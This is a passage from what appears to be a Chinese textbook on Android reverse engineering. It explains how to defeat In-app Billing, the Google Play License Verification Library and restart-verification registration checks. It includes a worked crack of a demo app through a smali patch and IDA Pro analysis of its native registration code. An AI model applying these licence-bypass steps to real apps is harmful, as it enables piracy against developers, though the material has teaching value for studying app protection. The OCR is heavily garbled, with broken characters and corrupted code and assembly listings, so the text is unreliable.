使 用 本 地 存储 ， 每 次 使 用 这 些 功 能 都 需要 联网 购买 ， 第 一 种 破解 方法 就 
会 失效 。 这 种 情况 下 可 以 尝试 阅读 提示 购买 页 面 的 代码 ， 然 后 修改 购买 
按钮 的 功能 代码 ， 通 常 这 段 代 码 会 引导 用 户 转 到 Google 钱 包 页 面 进行 交 
费 ， 购 买 成 功 后 会 向 软件 发 送 Action 为 PURCHASE_STATE_CHANGED 
的 广播 ， 软 件 收 到 广播 后 传递 给 BillingService 与 Security 进 入 处 理 与 验 
证 ， 最 后 通过 判断 purchaseState 的 值 来 决定 软件 是 否 购买 成 功 。 现 在 思 
路 又 来 了 了， 首先 是 构造 JSON 字 符 串 ， 手 动 给 软件 发 送 Action 为 
PURCHASE_STATE_CHANGED 的 广播 ， 这 个 简单 ， 编 写 一 个 小 程序 
即 可 ， 然 后 是 修改 Security 的 验证 代码 ， 把 关于 随机 数 与 JSON 字 符 串 签 
名 的 代码 全 部 删除 ， 然 后 设置 VerifiedPurchase 列 表 中 每 个 成 员 的 
purchaseState 值 都 为 PURCHASED， 这 样 只 要 软件 收 到 付费 状态 改变 的 
广播 ， 都 会 认为 软件 购买 成 功 ， 从 而 完美 地 绕 过 了 付费 环节 。 

从 上 面 两 种 破解 m-app Billing 软 件 的 方法 来 看 ， 这 种 应 用 内 付费 的 
机 制 本 号 没 有 问题 ,但 由 于 所 有 的 状态 检查 与 验证 都 是 由 Java 代 码 来 完 
成 ， 而 且 都 是 由 软件 自身 来 控制 ， 这 就 给 Cracker 带 来 了 很 大 的 “活动 ” 空 
间 ， 直 接 导 致 了 软件 轻易 就 被 破解 。 

本 小 节 不 提供 实例 讲解 ， 有 兴趣 的 朋友 请 自行 研究 。 























9.5 ”Google Play License 保 护 


除了 使 用 In-app Billing 方 式 进行 应 用 内 付费 外 ，Android 还 文 持 使 用 
License 来 保护 自己 的 软件 。Android 的 License 保 护 同 样 有 着 自己 的 一 套 
机 制 。 








9.5.1 Google Play License 保 护 机 制 


Google 官 方 提供 了 Android 应 用 商店 Google Play， 用 户 可 以 在 Google 
Play 中 下 载 免 费 或 者 收费 的 软件 。 使 用 Google ”Play 服务 有 如 下 限制 条 
件 : 

e Google Play 是 基于 网 络 的 服务 。 

e 手机 上 必须 安装 Google Play 商店 应 用 程序 

e 手机 设备 必须 与 一 个 Google 账 号 绑 定 ， 人 Play 通过 该 账号 
查询 已 经 下 载 或 购买 的 软件 信息 

在 手机 上 设 定 Google 账 号 需要 手机 中 安装 有 Google 服 务 包 ， 然而 大 
部 分 手机 在 出 广 时 并 没有 附 融 该 服务 包 ， 有 用户 手动 安装 它 需 要 手机 能 够 
获取 root 权 限 ， 这 意味 着 没有 root 权 限 的 手机 通常 不 能 使 用 该 项 服务 。 
男 外 ， 限 于 国内 的 法 律 约束 ， 用 户 无 法 在 Google Play 商 店 中 购买 收费 软 
件 ， 只 能 下 载 部 分 区 域 的 免费 软件 。 

Android 的 License 保 护 是 通过 License Verification Library (License 验 
证 库 ， 以 下 简称 为 LVL) 来 实现 的 。LVL 实 现 了 一 套 与 Google Play 商店 
apk 〈com.android.vending) 通信 的 机 制 ，LVL 通 过 Binder 机 制 调用 
com.android.vending.licensing 的 checkLicense() 方 法 ， 后 者 会 连接 Google 
Play 验 证 服务 器 ， 从 软件 发 布 者 数据 库 中 查询 用 户 的 购买 状态 ， 然 后 回 
传 信息 给 Google Play 商店 apk 程 序 ， 最 后 apk 程 序 调用 程序 设置 的 回调 方 























法 来 处 理 程序 的 购买 状态 ， 整 个 验证 过 程 如 图 9-8 所 示 。 


Google Play 验证 服务 器 
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图 9-8 ”LYVL 验 证 机 种 


然而 ，LVL 并 不 是 一 个 固定 的 SDK 库 ，Google 人 允许 开发 人 员 自 己 实 
现 LVL 验 证 库 。 安 装 Android SDK 时 ， 在 SDK Manager 中 勾 选 Extras 下 的 
Google Play Licensing Library 可 以 下 载 到 一 份 Google 提 供 的 LVL 库 实 
例 ， 开 发 人 员 不 需要 修改 它 的 代码 就 可 以 应 用 到 软件 中 去 。 下 面 我 们 来 
看 看 实现 LVL 需 要 遵守 哪些 规范 。 

一 个 最 简单 的 LVL 需 要 实现 以 下 的 接口 与 方法 : 

© Policy 

Policy 接 口 用 于 检测 软件 的 购买 状态 。 软 件 的 状态 可 以 是 
LICENSED (已 购买 ) 、NOT_LICENSED (未 购买 ) 或 者 RETRY ( 重 
试 ) ，RETRY 意 味 着 软件 的 Lincese 状 态 无 法 访问 ， 通 常 是 未 安装 
Google 服 务 包 或 者 网 络 不 通 。Policy 接 口 定 义 了 两 个 方法 : 











processServerResponse() 用 于 人 处理 服务 器 返回 的 啊 应 数据 ，allowAccess() 
用 于 检查 用 户 是 否 有 权限 运行 本 软件 。 

© LicenseCheckerCallback 

LicenseCheckerCallback 接 口 定 义 了 Lincese 检 查 器 的 回调 方法 。 
allow(0) 方 法 通常 在 软件 状态 为 Policy.LICENSED 或 Policy.RETRY 时 调 
用 ，dontAllow0 通 常 在 软件 状态 为 Policy.LICENSED 或 Policy.RETRY 时 
调用 ，applicationError (0) 通常 在 发 生 网 络 故 障 或 软件 运行 出 现 安全 异常 
时 调用 。 

e Obfuscator 

Obfuscator 接 口 用 于 混 消 处 理 本 地 存储 的 软件 购买 状态 。 当 从 
Google Play 验证 服务 器 上 获取 到 软件 的 购买 状态 后 《例如 已 经 购买 ) ， 
可 以 将 其 状态 保存 到 本 地 文件 中 ， 通 常 使 用 SharedProferences 保 存 到 软 
件 的 私有 数据 目录 ， 软 件 运 行 时 可 以 先 检 查 它 的 内 容 来 确定 是 否 已 经 购 
买 ， 而 不 必 每 次 运行 时 都 联网 检查 。Obfuscator 接 口中 的 方法 obfuscate0) 
与 unobfuscate() 束 是 用 于 购买 状态 数据 的 加 密 与 解密 。 

e@ LicenseChecker 与 LicenseValidator 

LicenseChecker 类 用 于 License 的 检查 与 验证 ， 验 证 的 工作 通常 由 单 
独 的 类 LicenseValidator 来 完成 。LicenseValidator 主 要 验证 Google Play 验 
证 服务 器 返回 的 啊 应 数据 ， 并 调用 传 入 的 callback 对 象 (LicenseChecker 
类 中 声明 的 LicenseCheckerCallback 接 口 ) 的 相应 方法 处 理 不 同 的 License 
状态 。 

以 上 的 接口 与 类 在 Android SDK\extras\google 目 录 下 的 play_licensing 
示例 项 目 中 都 有 完整 的 实现 ， 读 者 可 以 阅读 其 接口 与 方法 实现 来 加 强 理 
解 。 




















9.5.2 ”实例 破解 一 针对 Google Play License 方 式 
的 人 破解 





在 上 面 小 节 的 介绍 中 ， 笔 者 介绍 了 LVL 中 需要 实现 的 框架 接口 以 及 
它们 需要 实现 的 功能 。 从 接口 的 功能 来 看 ， 破 解 LVL 可 以 从 Policy 接 口 
与 LicenseChecker 接 口 入 手 ， 为 什么 是 这 样 的 呢 ? 让 我 们 分 析 看 看 。 

按照 LVL 框 架 的 实现 思路 ，Policy 是 由 LicenseChecker 调 用 的 ， 负 责 

调用 Obfuscator 接 口 的 unobfuscate() 方 法 来 获取 软件 的 购买 状态 ， 最 后 通 
过 其 allowAccess() 方 法 来 告诉 LicenseChecker 软 件 是 否 已 经 被 购买 。 毫 无 
疑问 ， 如 果 安 装 的 是 未 经 过 购买 的 收费 Android 软 件 ( 例 如 从 非 谷 歌 商 
店 的 其 它 渠 道 获 取 〉 ， 软 件 启动 并 读 取 购买 信息 时 ，Obfuscator 的 
unobfuscate() 方 法 会 调用 失败 ， 这 时 allowAccess0) 会 返回 假 ， 表 明 检 测 
本 地 购买 状态 失败 ，LicenseChecker 此 时 会 调用 LicenseValidator 接 口 去 
联网 检查 License 信 息 ， 验 证 购买 信息 时 会 回 LVL 验 证 服务 器 提交 软件 与 
设备 的 相关 信息 ， 如 果 是 正常 购买 了 该 软件 的 用 户 ， 会 返回 购买 成 功 的 
言 号 《本 地 检测 失败 ， 而 联网 验证 成 功 ， 这 种 情况 通常 会 在 手机 刷机 之 
后 重新 安装 该 软件 时 发 生 ) ， 并 通过 Obfuscator 接 口 的 obfuscate() 方 法 将 
结果 保存 下 来 ， 以 便 下 次 启动 程序 时 不 需要 联网 检查 ， 如 果 是 未 经 授权 
的 用 户 ， 返 回 的 信息 则 是 未 授权 ， 同 样 ， 这 些 信息 也 会 经 过 加 密 后 保存 
在 手机 的 存储 设备 中 。 

从 上 面 的 分 析 中 可 以 看 出 ，LicenseChecker 的 设计 十 分 重要 。 如 果 
LicenseChecker 只 是 通过 Policy 的 返回 结果 来 判断 软件 的 购买 状态 ， 那 破 
解 起 来 就 非常 简单 了 。 只 需 让 allowAccess() 方 法 永远 返回 为 真 即 可 破解 
挥 软件 的 验证 过 程 。 但 如 果 加 入 了 联网 验证 检查 License， 或 其 它 的 验证 
方式 ， 那 么 破解 起 来 束 稍 难 些 了 ， 可 能 需要 阅读 软件 作者 的 具体 实现 代 
码 来 采取 相应 的 措施 。 

综合 上 面 的 讲解 ， 笔 者 在 此 提出 两 种 破解 思路 : 

1. 信息 模拟 法 。LVL 是 如 何 判 断 哪 台 手机 是 否 已 经 购买 了 某 程序 
的 呢 ? 从 图 9-8 中 我 们 可 以 得 知 ，LVL 验 证 服务 器 上 为 每 个 收费 应 用 都 
记录 了 一 份 列表 ， 这 份 列 表 记 录 了 哪些 用 户 已 经 购买 了 该 应 用 ， 而 用 来 



































区 分 这 些 用 户 的 信息 是 靠 设 备 ID 来 完成 的 。 因 此 ， 破 解 人 员 可 以 修改 软 
件 中 获取 设备 有 DD 的 代码 为 一 个 已 经 购买 了 该 软件 的 设备 ID， 这 样 ， 软 件 
本 地 检测 购买 状态 失败 后 就 会 用 此 设备 ID 去 验证 购买 状态 ， 这 样 就 会 从 
服务 器 上 返回 已 经 购买 的 信息 ， 从 而 达到 通过 验证 的 目的 。 这 种 方法 能 
够 成 功 的 前 提 条 件 是 需要 知道 一 个 已 经 购买 了 该 软件 的 设备 ID， 但 通常 
这 是 比较 困难 的 。 

2. 修改 跳 转 法 。 修 改 Policy 接 口 与 LicenseChecker 接 口 的 返回 值 是 
比较 简单 也 现实 的 方法 ， 前 者 只 需 修 改 alowAccess() 方 法 ， 让 其 永远 返 
回 真 ， 而 后 者 中 关于 LicenseValidator 验 证 部 分 的 代码 可 以 全 部 无 视 ， 直 
接 在 代码 起 始 处 修改 为 LicenseCheckerCallback 接 口 的 allow0 方 法 调用 即 
可 。 最 后 ， 如 果 想 更 保险 起 见 ， 可 以 修改 获取 设备 ID 处 的 代码 来 隐藏 使 
用 者 的 喘 份 。 

目前 ， 网 上 已 经 有 人 开发 出 了 上 自动 破解 LVL 的 工具 AntiLVL。 对 这 
块 有 兴趣 的 读者 可 以 阅读 本 书 配套 源 代码 中 提供 的 实例 破解 过 程 〈 因 本 
节 内 容 较 敏感 ， 故 没有 直接 放 到 书 中 ) ， 来 了 解 LVL 的 实际 破解 方法 与 
AntiLVL 的 实现 原理 。 








9.6 重启 验证 





重 局 验证 是 一 种 币 见 的 软件 保护 技术 ， 它 的 保护 强度 与 开发 人 员 重 
司 验证 的 保护 思路 有关 。 


9.6.1 重启 验证 保护 思路 


重启 验证 的 通常 做 法 是 : 在 软件 注册 时 不 直接 提示 注册 成 功 与 售 ， 
而 是 将 注册 信息 保存 下 来 ， 然 后 在 软件 下 次 局 动 时 读 取 并 验证 ， 如 采 失 
败 则 软件 仍 未 注册 ， 成 功 则 开局 注册 版 的 功能 。 

Android 系 统 保存 信息 的 方法 有 限 ， 只 能 是 内 部 存储 、 外 部 存储 、 
数据 库 与 SharedProferences 等 4 种 方式 。 破 解 者 通常 可 以 在 短 时 间 内 找到 
注册 信息 的 保存 位 置 ， 因 此 ， 在 实际 使 用 重启 验证 的 过 程 中 ， 注 册 信息 
必须 要 加 蜜 存储 才能 保证 其 保护 强度 。 下 面 笔 者 给 出 几 种 常见 的 保护 方 


案 : 











e 单一 保护 。 重 启 验 证 保护 模块 使 用 Java 代 码 编 写 ， 注 册 信 息 加 
密 保 存 到 内 部 存储 中 。 

e 单一 保护 。 重 局 验证 保护 模块 使 用 Native 代 码 编号 ， 注 册 信息 
加 密 保 存 到 内 部 存储 中 。 

e 多 重 保护 。 重 局 验证 保护 模块 使 用 Native 代 码 编号 ， 并 在 代码 
中 加 入 网 络 验证 。 

笔者 给 出 的 方案 中 ， 使 用 Java 代 码 编写 的 重启 验证 保护 是 最 脆弱 
的 。Java 代 码 由 于 反 编 译 简单 的 原因 ， 破 解 者 能 够 在 短 时 间 内 分 析出 软 
件 的 重启 验证 思路 ， 从 而 破解 掉 软 件 。 使 用 Native 代 码 编写 重启 验证 保 
护 模 块 则 相对 好 一 些 ， 但 需要 注意 的 是 ， 代 码 中 尽量 不 要 使 用 明码 比 
较 ， 也 不 要 在 软件 中 只 使 用 一 个 简单 的 条 件 判断 就 确定 软件 是 否 注册 成 











功 ， 而 是 要 在 注册 功能 的 代码 中 插入 多 个 验证 点 ， 或 者 插入 一 些 暗 桩 代 
码 〈 所 谓 瞳 桩 代码 是 指 在 多 个 功能 代码 点 插入 注册 验证 代码 ， 验 证 失败 
就 退出 程序 。 暗 桩 代码 的 目的 就 是 让 破解 者 找 不 到 验证 点 ) ， 在 发 现 软 
件 注册 失败 而 被 肾 力 破解 的 情况 下 ， 不 定时 的 退出 程序 或 者 产生 姑 常 。 
最 后 的 多 重 保护 是 最 有 效 的 保护 手法 ， 将 重 司 验 证 与 网 络 验证 结合 ， 
以 大 大 增加 软件 的 破解 难度 ， 可 以 将 软件 的 部 分 功能 代码 加 密 ， 只 有 注 
册 成 功 后 才能 从 网 络 中 获取 解密 的 方法 或 解密 因子 ， 也 可 以 每 次 启动 通 
过 网 络 检查 软件 的 完整 性 ， 或 者 设 定 软件 有 效 使 用 时 间 等 等 ， 这 些 保护 
思路 需要 读者 不 断 的 总 结 ， 不 停 地 思考 来 完善 ， 笔 者 在 此 处 也 只 能 给 出 
指导 性 的 建议 。 


9.6.2 ”实例 破解 一 一 针对 重 司 验证 方式 的 破解 








为 了 使 本 节 的 实例 不 至 于 看 上 去 像 * 软 柿子 ”>， 轻 易 地 被 破解 掉 ， 在 
本 实例 的 重启 验证 的 保护 模块 笔者 使 用 了 Native 代 码 来 编写 。 运 行 本 小 
节 实 例 Ndkapp， 程 序 启动 后 的 界面 如 图 9-11 所 示 〈 注 : 图 9-9 和 图 9-10 在 
本 书 配套 源 代码 中 提供 的 实例 破解 过 程 中 ) 。 
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图 9-11 重启 验证 演示 程序 


从 标题 中 可 以 看 出 ， 该 软件 现在 处 于 未 注册 的 状态 。 点 击 执行 功能 
按钮 ， 程 序 弹 出 注册 提示 ， 点 击 确定 后 会 跳 转 到 软件 注册 页 面 ， 输 入 注 
册 码 后 点 击 注册 按钮 ， 软 件 会 提示 “注册 码 已 保存”， 如 图 9-12 所 示 ， 点 
击 确定 按钮 后 软件 会 自动 退出 。 
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图 9-12 重 局 验证 演示 程序 的 注册 页 面 


如 有 果 注 册 码 输入 错误 ， 软 件 在 启动 时 束 会 注册 失败 ， 从 而 继续 显示 
图 9-12 所 示 的 效果 。 我 们 现在 的 需求 是 ， 找到 该 程序 的 注册 验证 算法 并 
计算 出 注册 码 。 

按照 国际 惯例 ， 先 将 Ndkapp 反 编译 ， 为 了 加 快 分 析 进 度 ， 笔 者 使 用 
dex2jar 将 其 转 成 jar 文 件 来 分 析 。 使 用 jd-gui 打 开 反 编译 后 的 
Ndkapp.apk.dex2jar.jar， 定 位 到 MainActivity 的 OnCreate() 方 法 ， 如 图 9-13 
所 示 ， 程 序 启动 时 读 取 MyApp 类 的 成 员 m， 将 它 的 赋 给 了 i， 通 过 判断 i 
的 值 来 决定 软件 的 版 本 。 
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骨 android. support. v4 


| 出 ee 上 MainActivity.class x 
com. drolder. ndkapp 
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由 - 国 BuildConfig 图 | buhblic void onCreatelBundle Darampundle) 
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由 -四 lairkctivity 中 2 super.onCreateiparamBundle}); 
| 四 四 MairActivity 中 3 SetrontentVyiewl2130903040) : 


| [DD Wainketivyity MyApp localMyApp = INMyApp) yethpplicationi); 
-© Ilainkctivity Lab = MyApp.; 
o btnl : Button String strl; 











o5 workString : String if (i == 0) 

© doRegister() : void strl =“- 末 注册": 

© onrreate (Bundle) : void | while itrue) 

© onFreate0ptionsWlenu Menu)| { 

© worklStrine) : void String str2 = String.value0fi"NDK 保 护 与 重启 验证 访 示 程序 "); 
国 Hyhpp Strinyg str3 = str2 + strl; 
及 setTitle(str3}; 
四 Reghctivity$1$l Button localButtonl = (Button)lfindViewBYIdI2131165184) ， 
Reghctivity$l this.btnl = localButtonl; 
四 Reghctivity Button localButton2 = this.btnl; 
MainActivity.l1 locall = new MainActivity.l1ithis); 
localButton2.setOnClickListenerllocall); 
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由 
出 
由 








else if (i == 2) 
strl = "- 专 业 阪 "; 
else it {i == 3) 








图 9-13 ”MainActivity 的 OnCreate() 方 法 





MyApp 类 为 程序 的 Application 类 ， 在 程序 启动 时 最 先 执 行 ， 直 接 修 
改 成 员 凸 的 值 是 不 是 就 能 破解 掉 程 序 了 呢 ? 而 且 还 可 以 选择 自己 喜欢 的 
版 本 。 接 下 来 动手 试 试 ， 使 用 jd-gui 查 看 MyApp 的 代码 ， 发 现成 员 m 初 
始 值 为 0， 我 们 可 以 将 其 改 为 2 来 让 程序 变 成 专业 版 ， 另 外 ， 注 意 到 
MyApp 的 OnCreate() 方 法 中 调用 了 一 个 Native 的 initSNO 方 法 ， 为 了 防止 
该 方法 修改 m 的 值 影响 到 破解 效果 ， 我 们 需要 在 它 的 调用 下 面 为 m 成 员 
重新 赋值 一 次 。 使 用 ApkTool 反 编译 Ndkapp.apk， 打 开 MyApp.smali， 找 
到 关键 位 置 后 插入 赋值 代码 ， 如 图 9-14 所 示 (注意 : 修改 后 的 方法 使 用 
到 了 v0， 需 要 将 .locals 改 为 1) 。 





EE [ET ET EVRY MT pT TY .0 saali 一 再 otepadHH 
文件 人 ) 编辑 儒 ) 搜索 () 视图 ) 格式 如 语言 LL) 设置 If) 宏 @) 运行 信 ) 插件 下 ) 窗口 他) 了 

i: [6 思 因 态 尼 只 有 仍 | 省 家 议 |B3C| 哲 委 | 人 全 | 虽 旺 | 吉 | 届 加 | 回回 加 网 
百 Wrapp snali| 


.method public onCreatet(})vy 
locals 1 


























prologue 
sline 19 
invoke-virtual {pO0}, Lcom/droider/ndkapp/MyApp;->initSN()Y 





const/4 vO, Ox2 





sput vO, Lceom/droider/ndkapp/MyApp;->m:I 





‘line 21 
invoke-super {0}, Landroid/app/Application;->onCreate()})yv 
.line 22 


return-void 
end method 





User Define File -~ smali leneth :; 1186 lines : 67 Ta 3 和 | 


Dos\Windows 


图 9-14 ”修改 MainActivity.smali 





修改 完成 后 保存 退出 ， 并 使 用 ApkTool 重 新 打包 编译 Ndkapp。 再 次 
运行 程序 ， 标 题 的 确 显示 为 专业 版 了 ， 可 点 击 执行 功能 按钮 ， 软 件 会 弹 
出 提示 “软件 未 注册 ， 功 能 无 法 使 用 ”， 再 次 点 击 ， 会 弹出 注册 提示 框 ， 
如 图 9-15 所 示 。 





Wl 5554: Android2. 3.3 


程序 未 注册 


请 点 击 确 定 注 册 本 程序 或 者 点 击 
取 认 退出 程序 ! 





图 9-15 ”修改 后 的 Ndkapp 运 行 界面 
看 来 直接 修改 m 的 值 行 不 通 ， 需 要 继续 分 析 程 序 。 我 们 接 下 来 但 
看 “执行 功能 ”按钮 的 点 击 响 应 类 MainActivity$1 的 代码 。 它 的 OnClick() 
方法 代码 如 下 : 


public void onClick(View paramView) 
{ 


MyApp localMyApp = (MyaApPp)this.thiss$0.getapP1lication():; 
if (MyApp.m == 0) / /判断 MyApp 类 的 m 成 员 值 是 否 为 0 
this.thiss$0.doRegister(); // 弹 出 注册 提示 框 


while (true) 
{ 


return; 
( (MyApp) this.this$0.getApplication()) .work!(); // 调 用 MyApp 类 的 work ( ) 方法 
Context localContext = this.this$0.getApplicationContext(); 
String str = MainActivity.accesss0(); 
Toast .makeText (localContext，str，0) .show(); // 软 件 的 功能 就 是 弹出 不 同 的 
解密 信息 

} 

} 

虽然 上 面 代码 的 逻辑 不 太 准 确 ， 不 过 我 们 还 是 能 了 解 到 : 这 段 代 码 
首先 判断 MyApp 类 的 m 成 员 值 是 否 为 0， 如 果 为 0 就 弹出 注册 提示 框 ， 不 
为 0 就 调用 MyApp 类 的 work0 方 法 。work0 方 法 与 initSNO 方 法 一 样 ， 同 
样 是 Native 方 法 ， 下 面 是 时 候 让 IDA Pro 出 场 了 。 

将 libjuan.so 拖 入 IDA Pro 的 主 窗 口 ， 待 IDA Pro 分 析 完 后 查找 
com_droider_ndkapp_MyApp_work0O 函 数 。 发 现 并 没有 这 个 函数 ， 原 来 
是 libjuan.so 在 JNIL_OnLoad0) 方 法 被 调用 时 注册 了 其 他 的 函数 与 Java 层 的 
work() 方 法 关联 (JNI 相 关 的 基础 知识 请 读者 参看 书籍 ， 例 如 邓 凡 平 先生 
所 著 的 《深入 理解 Android: 卷 1》 一 书 的 第 2 章 ) 。 定 位 到 
JNI_OnLoad() 方 法 ， 其 反 汇 编 代码 如 下 : 





.text:00001314 JNI_OnLoad 

.text:00001314 LDR R3, ={(g_env_ptr - 0x1328) 

.text:00001318 STMFD SP!, {RA4-R6,LR} 

.text:0000131C MOV R2, #0x10000 

.text:00001320 LDR R5, [PC,R3] ; g_env 

.text:00001324 ADD R2i -R27, 淋 6 

.text:00001328 LDR R3，[R0] ”;RO 寄 存 器 保存 的 是 JavavM 指 针 

.text:0000132C MOV RI; RS 

.text:00001330 MOV LR, PC 

.text:00001334 LDR PC， [R3,#0x18] ;此 处 的 R3 指 向 JNIInvokeInterface 结 构 体 

的 首 地 址 

.text:00001338 CMP RO, #0 

.text:0000133C BEQ loc. 1348 

.text:00001340 MOV RO, OxFFFFFFFF 

.text:00001344 LDMFD SP!, {R4-R6,PC} 

.text:00001364 LDR R3， [R5] ” ;此 处 的 R3 指 向 JININativeInterface 结 构 体 的 首 
地 址 

.text:00001368 LDR R1, =(aComDroiderNdka - 0x1378) 

.text:0000136C MOV RO KR3 

.text:00001370 ADD RS ; "Ccom/droider/ndkapp/MyApp" 

.text:00001374 LDR R37; [RS 

.text:00001378 MOV LR, PC 

.text:0000137C LDR PC, [R3,#0x18] 

.text:00001380 LDR R2, =(native_class ptr —- 0x1394) 

.text:00001384 LDR R3, [RS] 

.text:00001388 MOV R1, RO 


.text:0000138C LDR R2, [PC,R2] ; native class 
.text:00001390 STR RO, [R2] 
.text:00001394 LDR R2, =(__ data_ start - 0x13A8) 


.text:00001398 MOV RO, R3 
.text:0000139C LDR R12，[R3] ;此 处 的 R12 指 向 JNINativeInterface 结 构 体 的 
首 地 址 
.text:000013A0 ADD R2，PC，R2 ; data_start ; JNINativeMethod 结 构 体 
数组 





.text:000013A4 MOV R3,， #3 
.text:000013A8 MOV LR, PC 
.text:000013AC LDR PC, [R12,#0x35C] 
.text:000013B0 CMP RO, #0 
.text:000013B4 BNE loc_13D8 
.text:000013EC MOV RO, OXFFFFFFFF 
.text:000013F0 LDMFD SP!, {R4-R6,PC} 
.text:000013F0 ; End of function JNI_OnLoad 


函数 的 开头 与 结尾 为 函数 执行 现场 的 保护 与 恢复 ， 详 细 的 分 析 内 容 
笔者 会 在 本 书 第 12 章 详细 介绍 。 本 小 节 只 分 析 程 序 中 关心 的 部 分 代码 。 
注意 看 代码 中 加 粗 的 指令 。 发 现 其 中 的 函数 调用 采用 如 下 的 汇编 指令 。 

瑟瑟 及 :下 人 证 攻 2 人 5 信和 

往 PC 寄 存 器 写 入 函数 地 址 实际 是 让 处 理 器 跳 转 到 函数 处 去 执行 。 
R12 寄存 器 由 上 上面 可 知 是 g_env 保 存 的 全 局 JNIEnv 的 指针 ， 回 忆 本 书 7.6 
节 讲 述 的 内 容 ， 该 指针 指 癌 的 实际 是 JNINativeInterface 结 构 的 首 地 址 。 
每 一 个 4 字 市 的 偏 移 都 存放 着 一 个 函数 指针 。 按 照 7.6 小 节 导 入 jni.h 后 ， 

会 在 IDA Pro 的 类 型 库 中 加 入 JNINativeInterface 与 JNIInvokeInterface 的 结 
构 定 义 。 此 时 可 以 在 IDA Pro 的 Structures 选 项 卡 中 按 下 键盘 的 Insert 键 ， 
打开 创建 结构 体 对 话 框 ， 然 后 点 击 “Add Standard Structure” 打开 结构 体 
选择 框 ， 最 后 将 JNINativeInterface 导 入 即 可 。 如 果 读 者 没有 按照 7.6 小 市 
导入 jnih 也 没有 关系 ， 可 以 点 击 IDA Pro 菜 单项 “File -Script fie”， 导 入 
随 书 光盘 中 本 小 节 提 供 的 jni.idc 文 件 ， 同 样 会 在 IDA Pro 的 Structures 选 项 
卡 中 添加 JNINativeInterface 的 结构 定义 。 另 外 ， 注 意 这 段 代 码 中 有 两 

条 “LDR PC，[R3,#0x18]” 指 令 ， 前 者 是 JavaVM 指 针 ， 后 者 是 JNIEnv 指 
针 。 

在 “LDR PC，[R12,#0x35C] 指 令 的 数值 0x35C 上 点 击 右键 ， 然 后 在 
弹出 的 菜单 中 选择 [R12,# 林 NINativelInterface.RegisterNatives]|， 其 他 的 几 
处 调用 也 如 法 炮制 ， 最 终 完成 后 的 效果 如 下 。 





.text:00001334 LDR PC, [R3,#JNIINnvokeInterface.GetEnv] 


.text:00001370 ADD RC 于 ; "Com/droider/ndkapp/MyApp" 

.text:00001374 LDR RR [RS 

.text:00001378 MOV LR FC 

:text:0000137GC LDR PC, [R3,#JNINativeInterface.FindClass] 

.text:000013A0 ADD R2，PC，R2 ; data_start ; JNINativeMethod 结 构 体 
数组 

.text:000013A4 MOV R3,， #3 

.text:000013A8 MOV JR 有 人 

.text:000013AC [R12,#JNINativeInterface.RegisterNatives] 


RegisterNatives 需 要 传 入 一 个 JNINativeMethod 结 构 体 数组 ， 此 处 代 
码 传 入 的 是 _data_start 首 地 址 。 双 击 _ data_start 跳 转 到 其 所 在 位 置 。 发 


现 数据 如 下 。 
.data:00004EA4 __data_start DCD aInitsn ; DATA XREF: JNI_OnLoad+8Cio 
.data:00004EA4 ; .text:off_140810o 
.data:00004EA4 ;LnLESN' 
.data:00004EA8 DCD aV i 
.data:00004EAC DCD nl1 
.data:00004EB0 DCD aSavesn ; "SaVeSN" 
.data:00004EB4 DCD aLjavaLangSsStrin ; "(Ljava/lang/String;)V" 
.data:00004EB8 DCD n2 
.data:00004EBC DCD aWork : Work" 
.data:00004EC0O DCD aV Wain 


.data:00004EC4 DCD n3 


最 后 总 结 得 出 : Native 的 n10 函 数 对 应 Java 的 initSNO 方 法 ，n20 函 数 
对 应 saveSNO 方 法 ，n30 函 数 对 应 work0) 方 法 。 了 解 到 这 点 后 ， 直 接 查 看 
n3() 函 数 的 代码 。n3() 函 数 站 先 调用 了 n1()， 然 后 调用 getValue() 来 获取 
MyApp 成 员 m 的 值 ， 接 着 根据 m 的 值 选 择 不 同 的 字符 串 ， 最 后 通过 
callWork() 调 用 com.droider.ndkapp.MainActivity 类 的 work0 方 法 ， 后 者 实 
际 上 是 设置 字符 串 成 员 workString 的 值 。m30) 函 数 的 代码 就 不 列 出 来 
了 ， 笔 者 可 以 自己 动手 分 析 ， 以 提高 Native 代 码 的 分 析 能 力 。 我 们 主要 
是 看 n10 函 数 的 代码 ， 写 的 主要 作用 是 读 取 注 册 信 息 ， 然 后 进行 注册 信 
息 的 合法 性 检查 ， 它 的 代码 如 下 。 








.text: 


.text 


‘text: 
bext: 
text; 
‘text: 
eo 
EX 
“七色 区 七 : 
.text: 
text:: 
“text: 
:00001554 


.text 


text: 
:text: 
“text,: 
.text: 
.text: 
“Lert 
itext: 
.text: 
.text: 
.text: 
“text: 
“bext 
text: 
sbext: 
text: 


0000152C nl 
:0000152C 


0000152C 
00001530 
00001534 
00001538 
0000153C 
00001540 
00001544 
00001548 
0000154C 
00001550 


00001558 
0000155C 
00001560 
00001564 
00001568 
0000156C 
00001570 
00001574 
00001578 
0000157C 
00001580 
00001584 
00001588 
0000158C 
00001590 


; CODE XREF: n3+8|p 

; DATA XREF: .data:00004EACHo 
SP!, {R4-R8,LR} 
RT, etaR = OXl544) 


RI RO 

RO, =(aSdcardReg_dat - 0x1548) 

pe 人 

RO “PCy RO ; "/sdcard/reg.dat" 
fopen ; 打开 /sdcard/reg .dat 文 件 
RS5 有 OF 二 0 

return ; 打开 失败 就 返回 

Rl1, #0 * EE 

R23 2 ; whence = SEEK_END 
fseek ; 跳 转 到 文件 结尾 

RO RS ; stream 

ftell ; 获取 文件 的 大 小 

R6, RO 

RU a 寺 直 ; Size 

malloc ; 分 配 内 存 ， 用 来 存放 文件 内 容 
R4, RO, #0 

goclosefile ; 分 配 失败 就 关闭 文件 并 返回 
RL 者 区 区 和 下 

有 2 RL ; whence = SEEK_SET 
RO, R5 ; Stream 

fseek ; 跳 转 到 文件 开头 

R1, R6 2 

Ro $1 > 

Rs RS ; Stream 


.text: 
tect 
text: 
.text: 
-text: 
.text: 
. text 
“text: 
.text: 
text: 
text: 
text: 
text: 
.text: 
‘text: 
"text: 
.text: 
“text:: 
.text: 
.text: 
el = > EO 
text: 
text:; 
.text: 
.text: 
tert 
: text 
.text: 
re 4 ce 
“Ce 


-text 


.text: 
-text: 
-text: 
EX 
七 名 也 七 3 
.text: 
“text: 
-2 


00001594 MOV 
00001598 BL 
0000159C LDR 
000015A0 MOV 
000015A4 STRB 
000015A8 ADD 
000015AC MOV 
000015B0 BL 
000015B4 CMP 
000015B8 BEQ 
000015BC LDR 
000015C0 MOV 
000015C4 ADD 
000015C8 BL 
000015CC CMP 
000015D0 BEQ 
000015D4 LDR 
000015D8 MOV 
000015DC ADD 
000015E0 BL 
000015E4 CMP 
000015E8 BEO 
000015EC LDR 
000015F0 MOV 
000015F4 ADD 
000015F8 BL 
